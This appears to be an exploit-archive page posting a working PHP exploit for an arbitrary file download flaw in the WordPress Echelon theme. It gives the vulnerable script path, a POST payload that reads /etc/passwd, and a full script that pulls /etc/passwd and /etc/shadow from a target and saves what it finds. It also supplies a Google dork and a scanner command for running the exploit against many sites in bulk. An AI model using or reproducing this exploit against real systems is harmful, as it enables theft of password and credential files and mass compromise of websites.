facebook facebook twitter rss

File Submissions Exploit Wordpress A.F.D Theme Echelon

Author: Cleiton Pinheiro , Published: 30-03-2015
Name:
Wordpress A.F.D Theme Echelon / INURL - BRASIL

Description:
This exploit allows attacker to download any writable file from the server

Usage info:
Put the path of the file in the file's field of the exploit ,then click "Download" button then you get the file directly

File download /etc/passwd & /etc/shadow

Failure consists of exploring a parameter $ _POST file
/wp-content/themes/echelon/lib/scripts/dl-skin.php

The following fields are exploited for Arbitrary File Download
POST:
_mysite_download_skin={$config['file']}&submit=Download
ex:
_mysite_download_skin=/etc/passwd&submit=Download

Exploit:


<?php
/*
#===============================================================================
# NAME: Wordpress A.F.D Theme Echelon
# TIPE: Arbitrary File Download
# Google DORK: inurl:/wp-content/themes/echelon
# Vendor: www.wordpress.org
# Tested on: Linux
# EXECUTE: php exploit.php www.alvo.com.br
# OUTPUT: EXPLOIT_WPAFD_Echelon.txt
#
# AUTOR: Cleiton Pinheiro / Nick: googleINURL
# Blog: http://blog.inurl.com.br
# Twitter: https://twitter.com/googleinurl
# Fanpage: https://fb.com/InurlBrasil
# Pastebin http://pastebin.com/u/Googleinurl
# GIT: https://github.com/googleinurl
# PSS: http://packetstormsecurity.com/user/googleinurl
# YOUTUBE: http://youtube.com/c/INURLBrasil
# PLUS: http://google.com/+INURLBrasil
#
#
#------------------------------------------------------------------------------
# Comand Exec Scanner INURLBR:
# ./inurlbr.php --dork 'inurl:/wp-content/themes/echelon' -q 1,6 -s save.txt --comand-all "php exploit.php _TARGET_"
#
#------------------------------------------------------------------------------
# Download Scanner INURLBR:
# https://github.com/googleinurl/SCANNER-INURLBR
#===============================================================================
*/
error_reporting(1);
set_time_limit(0);
ini_set('display_errors', 1);
ini_set('max_execution_time', 0);
ini_set('allow_url_fopen', 1);
ob_implicit_flush(true);
ob_end_flush();
print empty($argv[1]) ? exit("0x[ERROR]: DEFINA URL / Execute: php exploit.php www.alvo.com.br\n") : NULL;
$argv[1] = isset($argv[1]) && strstr($argv[1], 'http') ? $argv[1] : "http://{$argv[1]}";
$config['line'] = "\n------------------------------------------------------------------------------------------------------------------\n";
$config['alvo'] = $argv[1];
$config['exploit'] = "/wp-content/themes/echelon/lib/scripts/dl-skin.php";

function __plus() {

ob_flush();
flush();
}

function __convertUrlQuery($query) {

$queryParts = explode('&', $query);
$params = array();
foreach ($queryParts as $param) {
$item = explode('=', $param);
$params[$item[0]] = urlencode($item[1]);
}

return $params;
}

function __request_info($curl, $config) {
$postDados = __convertUrlQuery("_mysite_download_skin={$config['file']}&submit=Download");
foreach ($postDados as $campo => $valor) {
$postDados_format .= $campo . '=' . ($valor) . '&';
}

$postDados_format = rtrim($postDados_format, '&');
curl_setopt($curl, CURLOPT_POST, count($postDados));
curl_setopt($curl, CURLOPT_POSTFIELDS, $postDados_format);
curl_setopt($curl, CURLOPT_URL, $config['alvo'] . $config['exploit']);
curl_setopt($curl, CURLOPT_USERAGENT, 'Mozilla/' . rand(1, 20) . '.0(X11; Linux x8' . rand(1, 20) . '_6' . rand(1, 20) . ') blog.inurl.com.br/'. md5(rand(1, 200)) . '.31 (KHTML, like Gecko) Chrome/26.0.1410.63 Safari/'. rand(1, 500) . '.31');
curl_setopt($curl, CURLOPT_REFERER, $config['alvo'] .
$config['exploit']);
curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt($curl, CURLOPT_CONNECTTIMEOUT, 20);
curl_setopt($curl, CURLOPT_HEADER, 1);
curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
$corpo = curl_exec($curl);
$server = curl_getinfo($curl);
$status = NULL;
preg_match_all('(HTTP.*)', $corpo, $status['http']);
preg_match_all('(Server:.*)', $corpo, $status['server']);
preg_match_all('(Content-Disposition:.*)', $corpo, $status['Content-Disposition']);
$info = str_replace("\r", '', str_replace("\n", '', "{$status['http'][0][0]}, {$status['server'][0][0]}{$status['Content-Disposition'][0][0]}"));
curl_close($curl);
unset($curl);
return isset($corpo) ? array('corpo' => $corpo, 'server' => $server,'info' => $info) : FALSE;
}

function main($config, $rest) {

__plus();
print "0x " . date("h:m:s") . " [INFO][EXPLOITATION THE FILE]:{$config['file']}:\n";
preg_match_all("(root:.*)", $rest['corpo'], $final);
preg_match_all("(sbin:.*)", $rest['corpo'], $final__);
preg_match_all("(ftp:.*)", $rest['corpo'], $final___);
preg_match_all("(nobody:.*)", $rest['corpo'], $final____);
preg_match_all("(mail:.*)", $rest['corpo'], $final_____);
$_final = array_merge($final[0], $final__[0], $final___[0], $final____[0], $final_____[0]);
$res = NULL;
if (preg_match("#root#i", $rest['corpo'])) {
$res.= "0x " . date("h:m:s") . " [INFO][IS VULN][RESUME][VALUES]:\n";
$res.=$config['line'] . "\n";
foreach ($_final as $value) {
$res.="0x " . date("h:m:s") . " [VALUE]: $value\n";
}
$res.=$config['line'];
__plus();
file_put_contents('EXPLOIT_WPAFD_Echelon.txt', "{$config['alvo']}\n{$res}\n", FILE_APPEND);
print "{$res}[VALUES SAVED]: EXPLOIT_WPAFD_Echelon.txt\n\n";
} else {

print "0x " . date("h:m:s") . " [INFO][NOT VULN]\n";
}
}

print "\r\n0x[EXPLOIT NAME]: Wordpress A.F.D Theme Echelon / INURL - BRASIL\n";
$config['file'] = '/etc/passwd';
$rest = __request_info($objcurl = curl_init(), $config);
__plus();
print $line;
print "0x " . date("h:m:s") . " [INFO]: {$rest['info']}\n";
print "0x " . date("h:m:s") . " [INFO][TARGET]: {$config['alvo']}\n";
main($config, $rest);
__plus();
$config['file'] = '/etc/shadow';
$rest = __request_info($objcurl = curl_init(), $config);
__plus();
main($config, $rest);
__plus();

Like us on Facebook :